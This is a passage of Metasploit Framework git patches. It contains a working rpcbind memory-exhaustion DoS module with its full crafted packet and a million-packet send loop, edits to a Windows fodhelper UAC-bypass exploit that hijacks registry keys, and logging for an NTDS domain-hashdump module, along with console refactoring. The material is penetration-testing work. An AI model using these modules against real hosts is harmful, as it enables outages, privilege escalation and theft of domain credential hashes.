b/modules/auxiliary/dos/rpc/rpcbomb.rb @@ -12,7 +12,10 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc', 'Description' => %q{ - This module XXX. + This module exploits a vulnerability in certain versions of + rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger + large (and never freed) memory allocations for XDR strings on + the target. }, 'Author' => [ @@ -30,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary register_options([ Opt::RPORT(111), OptAddress.new('RHOST', [true, 'RPC server target']), - OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate']) + OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate']), + OptInt.new('COUNT', [false, "Number of intervals to loop",1]) ]) end @@ -56,7 +60,11 @@ class MetasploitModule < Msf::Auxiliary pkt << [datastore['ALLOCSIZE']].pack('N') # Payload s = UDPSocket.new - s.send(pkt, 0, datastore['RHOST'], datastore['RPORT']) + count = 0 + while count < datastore['COUNT'] do + s.send(pkt, 0, datastore['RHOST'], datastore['RPORT']) + count += 1 + end sleep 1.5 @@ -67,6 +75,6 @@ class MetasploitModule < Msf::Auxiliary return end - print_good("Allocated #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}") + print_good("Completed #{datastore['COUNT']} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}") end end From a5805a55dc6e10d15b7ffec791520b94d6b96081 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 5 Jun 2017 12:35:54 -0500 Subject: [PATCH 26/38] make this a UDPScanner, rewrite --- modules/auxiliary/dos/rpc/rpcbomb.rb | 65 +++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb index b08bab58b5..5731e9eb61 100644 --- a/modules/auxiliary/dos/rpc/rpcbomb.rb +++ b/modules/auxiliary/dos/rpc/rpcbomb.rb @@ -6,7 +6,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos - # include Exploit::Remote::Udp + include Msf::Auxiliary::UDPScanner def initialize(info={}) super(update_info(info, @@ -32,49 +32,42 @@ class MetasploitModule < Msf::Auxiliary register_options([ Opt::RPORT(111), - OptAddress.new('RHOST', [true, 'RPC server target']), - OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate']), - OptInt.new('COUNT', [false, "Number of intervals to loop",1]) + OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]), + OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000]) ]) end + def scan_host(ip) + pkt = [ + 0, # xid + 0, # message type CALL + 2, # RPC version 2 + 100000, # Program + 4, # Program version + 9, # Procedure + 0, # Credentials AUTH_NULL + 0, # Credentials length 0 + 0, # Credentials AUTH_NULL + 0, # Credentials length 0 + 0, # Program: 0 + 0, # Ver + 4, # Proc + 4, # Argument length + datastore['ALLOCSIZE'] # Payload + ].pack('N*') - - def run - require 'socket' - - pkt = [0].pack('N') # xid - pkt << [0].pack('N') # message type CALL - pkt << [2].pack('N') # RPC version 2 - pkt << [100000].pack('N') # Program - pkt << [4].pack('N') # Program version - pkt << [9].pack('N') # Procedure - pkt << [0].pack('N') # Credentials AUTH_NULL - pkt << [0].pack('N') # Credentials length 0 - pkt << [0].pack('N') # Credentials AUTH_NULL - pkt << [0].pack('N') # Credentials length 0 - pkt << [0].pack('N') # Program: 0 - pkt << [0].pack('N') # Ver - pkt << [4].pack('N') # Proc - pkt << [4].pack('N') # Argument length - pkt << [datastore['ALLOCSIZE']].pack('N') # Payload - - s = UDPSocket.new + s = udp_socket(ip, datastore['RPORT']) count = 0 while count < datastore['COUNT'] do - s.send(pkt, 0, datastore['RHOST'], datastore['RPORT']) + begin + s.send(pkt, 0) + rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED + vprint_error("Host #{ip} unreachable") + break + end count += 1 end - sleep 1.5 - - begin - s.recvfrom_nonblock(9000) - rescue - print_error("No response from server received.") - return - end - - print_good("Completed #{datastore['COUNT']} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}") + vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}") end end From bc3b88375803c5a4c5c4ff3c9b86131b69a53806 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Mon, 5 Jun 2017 13:49:59 -0500 Subject: [PATCH 27/38] Add docs, fix typo, add missing report mixin to avoid error. --- .../auxiliary_scanner_template.erb | 2 +- .../modules/auxiliary/dos/rpc/rpcbomb.md | 29 +++++++++++++++++++ modules/auxiliary/dos/rpc/rpcbomb.rb | 1 + 3 files changed, 31 insertions(+), 1 deletion(-) create mode 100644 documentation/modules/auxiliary/dos/rpc/rpcbomb.md diff --git a/data/markdown_doc/auxiliary_scanner_template.erb b/data/markdown_doc/auxiliary_scanner_template.erb index 409a7c9970..e7adc934f9 100644 --- a/data/markdown_doc/auxiliary_scanner_template.erb +++ b/data/markdown_doc/auxiliary_scanner_template.erb @@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range msf <%= mod.type %>(<%= mod.shortname %>) > exploit ``` -Other examples of setting the RHSOTS option: +Other examples of setting the RHOSTS option: Example 1: diff --git a/documentation/modules/auxiliary/dos/rpc/rpcbomb.md b/documentation/modules/auxiliary/dos/rpc/rpcbomb.md new file mode 100644 index 0000000000..3d656d8ca9 --- /dev/null +++ b/documentation/modules/auxiliary/dos/rpc/rpcbomb.md @@ -0,0 +1,29 @@ +## Vulnerable Application + +This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4, +LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3. + +Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target. + +## Verification Steps + +1. Start msfconsole +1. Do: `use auxiliary/dos/rpc/rpcbomb` +1. Do: `set RHOSTS [IP]` +1. Do: `run` +1. Target should leak memory + +## Scenarios + +### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64) + +``` +msf > use auxiliary/dos/rpc/rpcbomb +msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7 +RHOSTS => 10.0.2.7 +msf auxiliary(rpcbomb) > run + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(rpcbomb) > +``` diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb index 5731e9eb61..c88f03d693 100644 --- a/modules/auxiliary/dos/rpc/rpcbomb.rb +++ b/modules/auxiliary/dos/rpc/rpcbomb.rb @@ -6,6 +6,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner def initialize(info={}) From f4013b02e14991154f8df10a11c800ab544359aa Mon Sep 17 00:00:00 2001 From: darkbushido Date: Mon, 5 Jun 2017 14:19:18 -0500 Subject: [PATCH 28/38] renaming db_common to common this moves the following methods into common arg_host_range ( used in creds and db ) arg_port_range ( used in creds and db ) set_rhosts_from_addrs ( used in creds and db ) show_options ( used in jobs and modules ) --- lib/msf/ui/console/command_dispatcher.rb | 2 +- .../ui/console/command_dispatcher/common.rb | 147 ++++++++++++++++++ .../ui/console/command_dispatcher/creds.rb | 39 +---- lib/msf/ui/console/command_dispatcher/db.rb | 52 +------ .../console/command_dispatcher/db_common.rb | 57 ------- lib/msf/ui/console/command_dispatcher/jobs.rb | 1 + .../ui/console/command_dispatcher/modules.rb | 39 +---- 7 files changed, 155 insertions(+), 182 deletions(-) create mode 100644 lib/msf/ui/console/command_dispatcher/common.rb delete mode 100644 lib/msf/ui/console/command_dispatcher/db_common.rb diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb index 32fea80cf8..6f4d05180d 100644 --- a/lib/msf/ui/console/command_dispatcher.rb +++ b/lib/msf/ui/console/command_dispatcher.rb @@ -1,5 +1,5 @@ # -*- coding: binary -*- - +require 'msf/ui/console/command_dispatcher/common' module Msf module Ui module Console diff --git a/lib/msf/ui/console/command_dispatcher/common.rb b/lib/msf/ui/console/command_dispatcher/common.rb new file mode 100644 index 0000000000..f9a5cc9201 --- /dev/null +++ b/lib/msf/ui/console/command_dispatcher/common.rb @@ -0,0 +1,147 @@ +# -*- coding: binary -*- + +require 'rexml/document' +require 'rex/parser/nmap_xml' +require 'msf/core/db_export' + +module Msf +module Ui +module Console +module CommandDispatcher + + # These are functions that are used in two or more command dispatchers. + +module Common + + # Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+ + # + # @note This modifies +host_ranges+ in place + # + # @param arg [String] The thing to turn into a RangeWalker + # @param host_ranges [Array] The array of ranges to append + # @param required [Boolean] Whether an empty +arg+ should be an error + # @return [Boolean] true if parsing was successful or false otherwise + def arg_host_range(arg, host_ranges, required=false) + if (!arg and required) + print_error("Missing required host argument") + return false + end + begin + rw = Rex::Socket::RangeWalker.new(arg) + rescue + print_error("Invalid host parameter, #{arg}.") + return false + end + + if rw.valid? + host_ranges << rw + else + print_error("Invalid host parameter, #{arg}.") + return false + end + return true + end + + # + # Parse +arg+ into an array of ports and append the result into +port_ranges+ + # + # Returns true if parsing was successful or nil otherwise. + # + # NOTE: This modifies +port_ranges+ + # + def arg_port_range(arg, port_ranges, required=false) + if (!arg and required) + print_error("Argument required for -p") + return + end + begin + port_ranges << Rex::Socket.portspec_to_portlist(arg) + rescue + print_error("Invalid port parameter, #{arg}.") + return + end + return true + end + + # + # Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses + # + # This stores all the addresses to a temporary file and utilizes the + # 
file:/tmp/filename
syntax to confer the addrs. +rhosts+ + # should be an Array. NOTE: the temporary file is *not* deleted + # automatically. + # + def set_rhosts_from_addrs(rhosts) + if rhosts.empty? + print_status("The list is empty, cowardly refusing to set RHOSTS") + return + end + if active_module + mydatastore = active_module.datastore + else + # if there is no module in use set the list to the global variable + mydatastore = self.framework.datastore + end + + if rhosts.length > 5 + # Lots of hosts makes 'show options' wrap which is difficult to + # read, store to a temp file + rhosts_file = Rex::Quickfile.new("msf-db-rhosts-") + mydatastore['RHOSTS'] = 'file:'+rhosts_file.path + # create the output file and assign it to the RHOSTS variable + rhosts_file.write(rhosts.join("\n")+"\n") + rhosts_file.close + else + # For short lists, just set it directly + mydatastore['RHOSTS'] = rhosts.join(" ") + end + + print_line "RHOSTS => #{mydatastore['RHOSTS']}" + print_line + end + + def show_options(mod) # :nodoc: + mod_opt = Serializer::ReadableText.dump_options(mod, ' ') + print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) + + # If it's an exploit and a payload is defined, create it and + # display the payload's options + if (mod.exploit? and mod.datastore['PAYLOAD']) + p = framework.payloads.create(mod.datastore['PAYLOAD']) + + if (!p) + print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n") + return + end + + p.share_datastore(mod.datastore) + + if (p) + p_opt = Serializer::ReadableText.dump_options(p, ' ') + print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0) + end + end + + # Print the selected target + if (mod.exploit? and mod.target) + mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ') + print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0) + end + + # Print the selected action + if mod.kind_of?(Msf::Module::HasActions) && mod.action + mod_action = Serializer::ReadableText.dump_module_action(mod, ' ') + print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0) + end + + # Uncomment this line if u want target like msf2 format + #print("\nTarget: #{mod.target.name}\n\n") + end + + +end + +end +end +end +end diff --git a/lib/msf/ui/console/command_dispatcher/creds.rb b/lib/msf/ui/console/command_dispatcher/creds.rb index 0eba702caa..b715afd55b 100644 --- a/lib/msf/ui/console/command_dispatcher/creds.rb +++ b/lib/msf/ui/console/command_dispatcher/creds.rb @@ -3,7 +3,6 @@ require 'rexml/document' require 'rex/parser/nmap_xml' require 'msf/core/db_export' -require 'msf/ui/console/command_dispatcher/db_common' module Msf module Ui @@ -15,7 +14,7 @@ class Creds include Msf::Ui::Console::CommandDispatcher include Metasploit::Credential::Creation - include Msf::Ui::Console::CommandDispatcher::DbCommon + include Msf::Ui::Console::CommandDispatcher::Common # # The dispatcher's name. @@ -53,39 +52,6 @@ class Creds true end - # - # Miscellaneous option helpers - # - - # Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+ - # - # @note This modifies +host_ranges+ in place - # - # @param arg [String] The thing to turn into a RangeWalker - # @param host_ranges [Array] The array of ranges to append - # @param required [Boolean] Whether an empty +arg+ should be an error - # @return [Boolean] true if parsing was successful or false otherwise - def arg_host_range(arg, host_ranges, required=false) - if (!arg and required) - print_error("Missing required host argument") - return false - end - begin - rw = Rex::Socket::RangeWalker.new(arg) - rescue - print_error("Invalid host parameter, #{arg}.") - return false - end - - if rw.valid? - host_ranges << rw - else - print_error("Invalid host parameter, #{arg}.") - return false - end - return true - end - # # Can return return active or all, on a certain host or range, on a # certain port or range, and/or on a service name. @@ -118,6 +84,9 @@ class Creds # TODO: this needs to be cleaned up to use the new syntax # def cmd_creds_help + require 'pry' + binding.pry + print_line print_line "With no sub-command, list credentials. If an address range is" print_line "given, show only credentials with logins on hosts within that" diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 960345afa9..64aa114fd0 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -3,7 +3,6 @@ require 'rexml/document' require 'rex/parser/nmap_xml' require 'msf/core/db_export' -require 'msf/ui/console/command_dispatcher/db_common' module Msf module Ui @@ -15,7 +14,7 @@ class Db require 'tempfile' include Msf::Ui::Console::CommandDispatcher - include Msf::Ui::Console::CommandDispatcher::DbCommon + include Msf::Ui::Console::CommandDispatcher::Common # # The dispatcher's name. @@ -1809,55 +1808,6 @@ class Db # Miscellaneous option helpers # - # Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+ - # - # @note This modifies +host_ranges+ in place - # - # @param arg [String] The thing to turn into a RangeWalker - # @param host_ranges [Array] The array of ranges to append - # @param required [Boolean] Whether an empty +arg+ should be an error - # @return [Boolean] true if parsing was successful or false otherwise - def arg_host_range(arg, host_ranges, required=false) - if (!arg and required) - print_error("Missing required host argument") - return false - end - begin - rw = Rex::Socket::RangeWalker.new(arg) - rescue - print_error("Invalid host parameter, #{arg}.") - return false - end - - if rw.valid? - host_ranges << rw - else - print_error("Invalid host parameter, #{arg}.") - return false - end - return true - end - - # - # Parse +arg+ into an array of ports and append the result into +port_ranges+ - # - # Returns true if parsing was successful or nil otherwise. - # - # NOTE: This modifies +port_ranges+ - # - def arg_port_range(arg, port_ranges, required=false) - if (!arg and required) - print_error("Argument required for -p") - return - end - begin - port_ranges << Rex::Socket.portspec_to_portlist(arg) - rescue - print_error("Invalid port parameter, #{arg}.") - return - end - return true - end # # Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into diff --git a/lib/msf/ui/console/command_dispatcher/db_common.rb b/lib/msf/ui/console/command_dispatcher/db_common.rb deleted file mode 100644 index 68f789d646..0000000000 --- a/lib/msf/ui/console/command_dispatcher/db_common.rb +++ /dev/null @@ -1,57 +0,0 @@ -# -*- coding: binary -*- - -require 'rexml/document' -require 'rex/parser/nmap_xml' -require 'msf/core/db_export' - -module Msf -module Ui -module Console -module CommandDispatcher - -module DbCommon - - # - # Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses - # - # This stores all the addresses to a temporary file and utilizes the - # 
file:/tmp/filename
syntax to confer the addrs. +rhosts+ - # should be an Array. NOTE: the temporary file is *not* deleted - # automatically. - # - def set_rhosts_from_addrs(rhosts) - if rhosts.empty? - print_status("The list is empty, cowardly refusing to set RHOSTS") - return - end - if active_module - mydatastore = active_module.datastore - else - # if there is no module in use set the list to the global variable - mydatastore = self.framework.datastore - end - - if rhosts.length > 5 - # Lots of hosts makes 'show options' wrap which is difficult to - # read, store to a temp file - rhosts_file = Rex::Quickfile.new("msf-db-rhosts-") - mydatastore['RHOSTS'] = 'file:'+rhosts_file.path - # create the output file and assign it to the RHOSTS variable - rhosts_file.write(rhosts.join("\n")+"\n") - rhosts_file.close - else - # For short lists, just set it directly - mydatastore['RHOSTS'] = rhosts.join(" ") - end - - print_line "RHOSTS => #{mydatastore['RHOSTS']}" - print_line - end - - -end - -end -end -end -end diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb index ac184be4e6..6ddb848068 100644 --- a/lib/msf/ui/console/command_dispatcher/jobs.rb +++ b/lib/msf/ui/console/command_dispatcher/jobs.rb @@ -16,6 +16,7 @@ module Msf # class Jobs include Msf::Ui::Console::CommandDispatcher + include Msf::Ui::Console::CommandDispatcher::Common @@handler_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner"], diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index 09ac5b9233..43a890a686 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -13,6 +13,7 @@ module Msf class Modules include Msf::Ui::Console::CommandDispatcher + include Msf::Ui::Console::CommandDispatcher::Common # Constant for a retry timeout on using modules before they're loaded CMD_USE_TIMEOUT = 3 @@ -997,44 +998,6 @@ module Msf show_module_set("Post", framework.post, regex, minrank, opts) end - def show_options(mod) # :nodoc: - mod_opt = Serializer::ReadableText.dump_options(mod, ' ') - print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) - - # If it's an exploit and a payload is defined, create it and - # display the payload's options - if (mod.exploit? and mod.datastore['PAYLOAD']) - p = framework.payloads.create(mod.datastore['PAYLOAD']) - - if (!p) - print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n") - return - end - - p.share_datastore(mod.datastore) - - if (p) - p_opt = Serializer::ReadableText.dump_options(p, ' ') - print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0) - end - end - - # Print the selected target - if (mod.exploit? and mod.target) - mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ') - print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0) - end - - # Print the selected action - if mod.kind_of?(Msf::Module::HasActions) && mod.action - mod_action = Serializer::ReadableText.dump_module_action(mod, ' ') - print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0) - end - - # Uncomment this line if u want target like msf2 format - #print("\nTarget: #{mod.target.name}\n\n") - end - def show_missing(mod) # :nodoc: mod_opt = Serializer::ReadableText.dump_options(mod, ' ', true) print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) From f47cc1a101c98e26603653573768d6eaae7ccafd Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Mon, 5 Jun 2017 14:32:45 -0500 Subject: [PATCH 29/38] Rubocop readability changes --- .../windows/local/bypassuac_fodhelper.rb | 113 +++++++++--------- 1 file changed, 57 insertions(+), 56 deletions(-) diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb index 8eac5c5949..f14d5fdff1 100644 --- a/modules/exploits/windows/local/bypassuac_fodhelper.rb +++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb @@ -14,50 +14,53 @@ class MetasploitModule < Msf::Exploit::Local include Post::Windows::Registry include Post::Windows::Runas - FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings" - FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" - EXEC_REG_DELEGATE_VAL = 'DelegateExecute' - EXEC_REG_VAL = '' # This maps to "(Default)" - EXEC_REG_VAL_TYPE = 'REG_SZ' - FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe" - CMD_MAX_LEN = 16383 + FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze + FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze + EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze + EXEC_REG_VAL = ''.freeze # This maps to "(Default)" + EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze + FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze + CMD_MAX_LEN = 16383 - def initialize(info={}) - super(update_info(info, - 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)', - 'Description' => %q{ - This module will bypass Windows 10 UAC by hijacking a special key in the Registry under - the current user hive, and inserting a custom command that will get invoked when - the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC - flag turned off. + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)', + 'Description' => %q{ + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under + the current user hive, and inserting a custom command that will get invoked when + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC + flag turned off. - This module modifies a registry key, but cleans up the key once the payload has - been invoked. + This module modifies a registry key, but cleans up the key once the payload has + been invoked. - The module does not require the architecture of the payload to match the OS. If - specifying EXE::Custom your DLL should call ExitProcess() after starting your - payload in a separate process. - }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'winscriptingblog', # UAC bypass discovery and research - 'amaloteaux' , # MSF module + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting your + payload in a separate process. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'winscriptingblog', # UAC bypass discovery and research + 'amaloteaux', # MSF module ], - 'Platform' => ['win'], - 'SessionTypes' => ['meterpreter'], - 'Targets' => [ + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] - ], - 'DefaultTarget' => 0, - 'References' => [ - [ - 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', - 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' - ] - ], - 'DisclosureDate'=> 'May 12 2017' - )) + ], + 'DefaultTarget' => 0, + 'References' => [ + [ + 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', + 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' + ] + ], + 'DisclosureDate' => 'May 12 2017' + ) + ) end def check @@ -71,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local def exploit commspec = '%COMSPEC%' registry_view = REGISTRY_VIEW_NATIVE - psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" + psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" # Make sure we have a sane payload configuration if sysinfo['Architecture'] == ARCH_X64 @@ -95,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Local end end - if !payload.arch.empty? && !(payload.arch.first == target_arch.first) + if !payload.arch.empty? && (payload.arch.first != target_arch.first) fail_with(Failure::BadConfig, 'payload and target should use the same architecture') end @@ -104,19 +107,18 @@ class MetasploitModule < Msf::Exploit::Local check_permissions! case get_uac_level - when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, - UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, - UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT - fail_with(Failure::NotVulnerable, - "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." - ) - when UAC_DEFAULT - print_good('UAC is set to Default') - print_good('BypassUAC can bypass this setting, continuing...') - when UAC_NO_PROMPT - print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') - shell_execute_exe - return + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return end payload_value = rand_text_alpha(8) @@ -145,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Local end registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) - registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. cmd_path = expand_path(commspec) @@ -153,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Local print_status("Executing payload: #{cmd_path} #{cmd_args}") # We can't use cmd_exec here because it blocks, waiting for a result. - client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true}) + client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true }) # Wait a copule of seconds to give the payload a chance to fire before cleaning up # TODO: fix this up to use something smarter than a timeout? @@ -171,7 +173,6 @@ class MetasploitModule < Msf::Exploit::Local registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) end registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view) - end def check_permissions! From 42aa2e5acf9ac3cb86c8ccd16c5d5374749bf2ca Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 5 Jun 2017 15:21:50 -0500 Subject: [PATCH 30/38] add some attempts at debugging to ntds add some logging and more status outputs to the NTDS domain hasdump. Also force the encoding on strings to UTF8 --- lib/metasploit/framework/ntds/account.rb | 2 +- lib/metasploit/framework/ntds/parser.rb | 4 +++- modules/post/windows/gather/credentials/domain_hashdump.rb | 4 ++++ 3 files changed, 8 insertions(+), 2 deletions(-) diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb index af2ecfcb77..62067abb0e 100644 --- a/lib/metasploit/framework/ntds/account.rb +++ b/lib/metasploit/framework/ntds/account.rb @@ -137,7 +137,7 @@ module Metasploit end def get_string(data,length) - data.slice!(0,length).gsub(/\x00/,'') + data.slice!(0,length).force_encoding("UTF-8").gsub(/\x00/,'') end def uac_string diff --git a/lib/metasploit/framework/ntds/parser.rb b/lib/metasploit/framework/ntds/parser.rb index 7c4d91890c..0ea69821cc 100644 --- a/lib/metasploit/framework/ntds/parser.rb +++ b/lib/metasploit/framework/ntds/parser.rb @@ -50,11 +50,13 @@ module Metasploit def pull_batch if channel.cid.nil? + dlog("NTDS Parser Channel was closed, reopening") reopen_channel end begin raw_batch_data = channel.read(BATCH_SIZE) - rescue EOFError + rescue EOFError => e + elog("NTDS Parser: Error pulling batch - #{e}") raw_batch_data = nil end raw_batch_data diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index 44e9001cde..ec0ee1332e 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -33,10 +33,13 @@ class MetasploitModule < Msf::Post if preconditions_met? ntds_file = copy_database_file unless ntds_file.nil? + file_stat = client.fs.file.stat(ntds_file) + print_status "NTDS File Size: #{file_stat.size.to_s} bytes" print_status "Repairing NTDS database after copy..." print_status repair_ntds(ntds_file) realm = sysinfo["Domain"] ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) + print_status "Started up NTDS channel. Preparing to stream results..." ntds_parser.each_account do |ad_account| print_good ad_account.to_s report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm) @@ -46,6 +49,7 @@ class MetasploitModule < Msf::Post report_hash(hash_string.downcase,ad_account.name, realm) end end + print_status "Deleting backup of NTDS.dit at #{ntds_file}" rm_f(ntds_file) end end From 1558db375d89a8e1d973483923948d4b36c8bbc1 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Mon, 5 Jun 2017 16:25:02 -0500 Subject: [PATCH 31/38] update CVE reference in where modules report_vuln --- modules/auxiliary/scanner/dns/dns_amp.rb | 9 +++++++-- modules/auxiliary/scanner/http/host_header_injection.rb | 1 + modules/auxiliary/scanner/http/jenkins_command.rb | 2 ++ modules/auxiliary/scanner/http/trace.rb | 7 ++++++- modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb | 1 + .../auxiliary/scanner/misc/sercomm_backdoor_scanner.rb | 1 + modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 1 + modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 1 + modules/auxiliary/scanner/ntp/ntp_readvar.rb | 1 + modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 1 + modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 1 + 